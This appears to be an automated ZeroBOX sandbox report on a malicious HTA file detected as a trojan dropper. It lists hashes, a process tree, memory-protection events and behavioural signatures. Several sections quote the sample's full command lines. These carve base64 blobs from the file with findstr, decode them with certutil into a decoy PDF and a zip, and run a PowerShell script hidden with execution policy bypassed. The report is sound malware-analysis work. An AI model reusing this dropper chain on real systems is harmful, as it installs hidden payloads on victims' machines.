Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 28, 2025, 3:12 p.m.	March 28, 2025, 3:15 p.m.

Size	163.1KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`f32e7891e2cfc58230057a506325c3c8`
SHA256	`02783530bbd8416ebc82ab1eb5bbe81d5d87731d24c6ff6a8e12139a5fe33cee`
CRC32	`F5A218AF`
ssdeep	`3072:UPzcBmc2YlnFBQsDqzpj8sfZCQiItHU/j1ICbM+33Eci:Acz29RNxY71ICAG3Eci`
Yara	None matched

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\sfmw.hta.html
3048
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:145409
  2224
  - cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
    1844
    - findstr.exe findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html"
      2632
  - cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
    2552
    - findstr.exe findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html"
      2468

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Allocates read-write-execute memory (usually to unpack itself) (50 out of 111 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 region_size: 2691072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002c30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002ec0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003190000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef69c9000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002ec0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 2224 region_size: 7606272 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002dc0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003500000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2025, 3:12 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW March 28, 2025, 3:13 p.m.	show_type: 0 filepath_r: cmd parameters: /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf filepath: cmd	1	1
CreateProcessInternalW March 28, 2025, 3:13 p.m.	thread_identifier: 996 thread_handle: 0x00000000000004f4 process_identifier: 2552 current_directory: C:\Users\test22\Desktop filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000004e0	1	1
ShellExecuteExW March 28, 2025, 3:13 p.m.	show_type: 0 filepath_r: cmd parameters: /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log filepath: cmd	1	1

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

ESET-NOD32	VBS/TrojanDropper.Agent.PMU
Avast	Script:SNH-gen [Trj]
AVG	Script:SNH-gen [Trj]

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 28, 2025, 3:13 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000007fffff80000 process_handle: 0xffffffffffffffff	1	0	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
cmdline	"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3048 CREDAT:145409
cmdline	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
cmdline	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf

A command shell or script process was created by an unexpected parent process (2 events)

parent_process	iexplore.exe				martian_process	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process	iexplore.exe				martian_process	cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf

One or more non-whitelisted processes were created (4 events)

parent_process	iexplore.exe	martian_process	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process	iexplore.exe	martian_process	cmd /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
parent_process	iexplore.exe	martian_process	cmd /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3048 resumed a thread in remote process 2224
NtResumeThread March 28, 2025, 3:12 p.m.	thread_handle: 0x0000000000000360 suspend_count: 1 process_identifier: 2224	1	0	0

Creates a suspicious Powershell process (6 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

sfmw.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All